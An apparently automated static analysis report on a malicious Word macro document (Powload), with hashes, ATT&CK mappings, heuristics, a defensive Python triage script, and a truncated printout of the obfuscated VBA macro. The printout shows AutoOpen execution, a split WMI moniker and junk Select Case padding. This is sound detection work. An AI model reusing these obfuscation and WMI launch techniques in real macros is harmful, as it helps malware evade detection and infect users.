Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 8d2de893cfdff2bb…

MALICIOUS

Office (OLE)

Size: 155.5 KB
Created: 2019-05-02 17:42:00
Authoring application: Microsoft Office Word
First seen: 2019-05-31
MD5: b31453bbc270351b0bcf50a89384cdb1
SHA-1: 5bb56a6408040a10d2b0a9183f5233e0f96403eb
SHA-256: 8d2de893cfdff2bb43f45e0daec423ef070eb67df0dcdf7b9393113b122f8a9d
Risk Score: 242

Malware Insights

MITRE ATT&CK
T1059 Command and Scripting Interpreter
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File

The sample carries a VBA project with an AutoOpen entry point, so the macro runs as soon as the document is opened with macros enabled; this is the standard execution trigger for malicious Office documents. The critical heuristic OLE_VBA_WMI_PROCESS_CREATE fired because the macro reaches WMI (Win32_Process.Create) to start a process. This launcher pattern sidesteps the more commonly monitored Shell and WScript.Shell calls, and the spawned process appears as a child of WmiPrvSE.exe rather than of WINWORD.EXE, which defeats parent-child detections keyed on the Office binary. In the extracted source the WMI moniker is assembled from short string fragments ("wi" + "nmg" + "mts:W" + ...) and the real logic is padded with Select Case blocks whose arms contain no statements, both of which defeat naive string matching. The independent ClamAV signature (Doc.Malware.Powload-6960282-0) corroborates the verdict.

Heuristics (7)

  • ClamAV: Doc.Malware.Powload-6960282-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Powload-6960282-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen. On its own this heuristic describes the old Word macro execution surface and is not a downloader or parser-CVE attribution. Note that the generic description of this heuristic refers to the case where no modern VBA project is recovered; for this sample a VBA project was recovered (see Extracted artifacts), so the marker corroborates the OLE_VBA_AUTOOPEN finding rather than adding an independent one.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body). This is the standard DrawingML XML namespace URI that Office embeds in any document containing drawing objects; it is not a network indicator and should not be blocked or hunted for.
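The Malware Insights paragraph and the OLE_VBA_WMI_PROCESS_CREATE heuristic both describe obfuscation that hides the WMI moniker behind line continuations and string concatenation, surrounded by no-op Select Case padding. The script below is an added illustration of how a triage tool recovers the moniker and the real control flow from that text; it is not the analysis engine that produced this report, and its indicator names and the junk-block rule (a Select Case whose every line is a Case arm) are this example's own assumptions. The embedded input is an excerpt copied from the macro preview in the Extracted artifacts section below; the remaining functions run on any VBA source text.

```python
"""Normalise an obfuscated VBA macro and flag WMI launcher indicators.

Added example for this report (not the report's own tooling). Steps:
  1. fold VBA line continuations ("... _" + newline) into one logical line,
  2. fold "a" + "b" / "a" & "b" string concatenation into one literal,
  3. drop Select Case blocks whose arms carry no statements (junk padding),
  4. search the cleaned text for the indicators the heuristics describe.
"""
import re

# Excerpt copied from the macro preview on this page: one junk Select Case
# block, the AutoOpen entry point and the split GetObject call. Constructed
# test input for this example; the real macro is far longer.
SAMPLE_VBA = '''Sub autoopen()
   Select Case u4003748
Case V690_5_ = b383083 = Sgn(789975877)
Case L90_533 = I6205389
Case Q819307 = Log(w21012)
Case a648953 = CBool(752808993)
End Select
Call Z0751158
End Sub

Function Z0751158()
On Error Resume Next
Set z651436 = J75203(GetObject("wi" _
+ "nmg" + "mts:W" _
+ "in32_P" + "rocess" _
+ "Sta" + "rtup"))
End Function
'''

# VBA requires whitespace before the continuation underscore, so an identifier
# ending in "_" at end of line (e.g. X_75983_) is not mistaken for one.
_CONTINUATION = re.compile(r"[ \t]+_[ \t]*\r?\n[ \t]*")
# Two adjacent string literals joined by + or &; "" inside a literal is an
# escaped quote and is kept as-is.
_STR_CONCAT = re.compile(r'"((?:[^"]|"")*)"\s*[+&]\s*"((?:[^"]|"")*)"')
# A whole Select Case ... End Select block (non-nested is all the sample needs).
_SELECT_BLOCK = re.compile(
    r"^[ \t]*Select Case\b.*?^[ \t]*End Select[ \t]*$\n?", re.S | re.M)

# Hypothetical indicator names for this example; the regexes mirror the
# report's heuristics (AutoOpen, GetObject, winmgmts moniker, Win32_Process).
INDICATORS = {
    "autoopen_entry": re.compile(
        r"^\s*(?:Public\s+|Private\s+)?Sub\s+AutoOpen\s*\(", re.I | re.M),
    "on_error_resume_next": re.compile(r"^\s*On Error Resume Next", re.I | re.M),
    "getobject_call": re.compile(r"\bGetObject\s*\(", re.I),
    "wmi_moniker": re.compile(r'"winmgmts:', re.I),
    "win32_process_startup": re.compile(r"\bWin32_ProcessStartup\b", re.I),
    # Only fires when the Win32_Process class itself is followed by .Create(.
    "win32_process_create": re.compile(
        r"\bWin32_Process\b.*\.Create\s*\(", re.I | re.S),
}


def join_continuations(src):
    """Fold VBA line continuations into single logical lines."""
    return _CONTINUATION.sub(" ", src)


def fold_string_concat(src):
    """Merge chains of literal concatenation until the text stops changing."""
    while True:
        folded = _STR_CONCAT.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', src)
        if folded == src:
            return folded
        src = folded


def strip_noop_select(src):
    """Remove Select Case blocks in which every inner line is a bare Case arm."""
    def repl(m):
        body = m.group(0).splitlines()[1:-1]
        if all(l.strip().startswith("Case ") or not l.strip() for l in body):
            return ""          # pure padding: nothing under any arm
        return m.group(0)      # real branching logic: keep it
    return _SELECT_BLOCK.sub(repl, src)


def junk_ratio(src):
    """Return (logical lines, lines removed as padding) for the macro text."""
    joined = join_continuations(src)
    total = len(joined.splitlines())
    kept = len(strip_noop_select(joined).splitlines())
    return total, total - kept


def triage(src):
    """Clean the macro and return recovered GetObject monikers and indicator hits."""
    cleaned = strip_noop_select(fold_string_concat(join_continuations(src)))
    monikers = re.findall(r'GetObject\s*\(\s*"([^"]*)"', cleaned, re.I)
    hits = {name: bool(rx.search(cleaned)) for name, rx in INDICATORS.items()}
    return {"cleaned": cleaned, "monikers": monikers, "indicators": hits}


if __name__ == "__main__":
    result = triage(SAMPLE_VBA)
    print(result["cleaned"])
    print("GetObject monikers:", result["monikers"])
    for name, hit in result["indicators"].items():
        print(f"  {name:24s} {'HIT' if hit else '-'}")
    print("padding removed: %d of %d lines" % junk_ratio(SAMPLE_VBA)[::-1])
```

Run on the excerpt, the cleaned text collapses to the AutoOpen stub calling Z0751158 and a single readable line, GetObject("winmgmts:Win32_ProcessStartup"). The win32_process_create indicator stays unset for this excerpt: the preview on this page only shows the ProcessStartup configuration object being obtained, so the Win32_Process.Create call that the heuristic reports is not in the visible portion, and a triage script should say so rather than infer it.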

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 8156 bytes
SHA-256: 6eb678ca13808c0ceb6f1439572fedaa5d97af9fd9b328f46f23b116b69e2943
Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "n796685"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "G0691882"
Attribute VB_Base = "0{CAED838C-D24C-4667-A69E-BB5E47197F60}{FC0332C9-EE49-4C51-89A9-619A5903126D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "E835_6"

Attribute VB_Name = "z4091088"

Attribute VB_Name = "C5_97962"

Attribute VB_Name = "j0_4_168"
Attribute VB_Base = "0{351BFC18-6341-4ADE-8601-8B294EC7AD83}{02ABF5B3-7D53-49C1-8479-E991A6546B11}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "u45743"
Function J75203(Z5365_0)
   Select Case E9483_4
Case u59_3080 = J658_568 = Sgn(281823806)
Case W886070 = z9601764
Case s81470 = Log(T48414)
Case n155394 = CBool(855321417)
Case w675_23 = 9912910
Case R4272663 = CDate(n26795_1)
End Select
   Select Case Q935_623
Case t4_1831 = I5994490 = Sgn(100076860)
Case N1268_2 = X6962_
Case j18607_ = Log(E012712)
Case s26581 = CBool(288668321)
Case j837523 = 217753308
Case C453210 = CDate(z067711)
End Select
Set J75203 = CVar(Z5365_0)
   Select Case a0715278
Case l_62_1 = w975_0 = Sgn(425756888)
Case N_3812_ = O909_147
Case z50857 = Log(W10883)
Case p07896_ = CBool(74968950)
Case J20615 = 805101607
Case L53929 = CDate(I171837)
End Select
   Select Case b585899
Case M085_542 = L59395 = Sgn(581916430)
Case R9_8720 = X1_760
Case z98357 = Log(Y193__2)
Case o14314 = CBool(82764585)
Case i648_0 = 704630931
Case q84_263 = CDate(F056_7)
End Select
End Function
Sub autoopen()
   Select Case u4003748
Case V690_5_ = b383083 = Sgn(789975877)
Case L90_533 = I6205389
Case Q819307 = Log(w21012)
Case a648953 = CBool(752808993)
Case U413__5 = 958880284
Case C82011 = CDate(H829072)
End Select
   Select Case D90_582
Case j871788 = Q896926 = Sgn(550810862)
Case J05987 = l670727
Case f185986 = Log(i61860)
Case S830_6_1 = CBool(998164648)
Case V18077_6 = 501379556
Case J_95027 = CDate(n589__)
End Select
   Select Case j31__904
Case I8034537 = r04833_ = Sgn(937145698)
Case l15_31_ = v228480
Case I1318_09 = Log(m900712)
Case v_4652 = CBool(309181841)
Case H__50299 = 324933311
Case X162718 = CDate(d83775)
End Select
Call Z0751158
   Select Case I1_565
Case H890_798 = s356282 = Sgn(855302431)
Case X23_70 = N44101
Case A079_18_ = Log(j8_447)
Case L_6941 = CBool(971891834)
Case R304472 = 640111904
Case H25549 = CDate(w4_197)
End Select
   Select Case m99231
Case K04333 = H1678202 = Sgn(851657368)
Case F18564 = s776_5
Case G721974 = Log(p858_841)
Case E659__ = CBool(215750355)
Case b763678 = 456767223
Case b68168 = CDate(T0045332)
End Select
End Sub

Attribute VB_Name = "M2790354"
Function Z0751158()
On Error Resume Next
   Select Case L2081048
Case v3867315 = r410739 = Sgn(771991915)
Case U428390 = E40860
Case P71534 = Log(u21101)
Case r672_305 = CBool(314658747)
Case H_86_6_6 = 178142381
Case I17857 = CDate(J19_9131)
End Select
   Select Case i637213
Case h99_164 = k35612_ = Sgn(408621320)
Case z6004_ = X_75983_
Case F_365760 = Log(Y18921)
Case q06188 = CBool(857799524)
Case R5842214 = 883505116
Case F345_44 = CDate(r398312)
End Select
Set z651436 = J75203(GetObject("wi" _
+ "nmg" + "mts:W" _
+ "in32_P" + "rocess" _
+ "Sta" + "rtup"))
   Select Case M17453
Case i04059 = j66120_3 = Sgn(622649106)
Case b003_2 = d623_39
Case b3135449 = Log(w524863)
Case j859026 = CBool(295591105)
Case i95219 = 430042625
Case G6758773 = CDate(Y98631)
End Select
   Select Case K516041_
Case M14201 = u38959 = Sgn(524907171)
Case z499
... (truncated)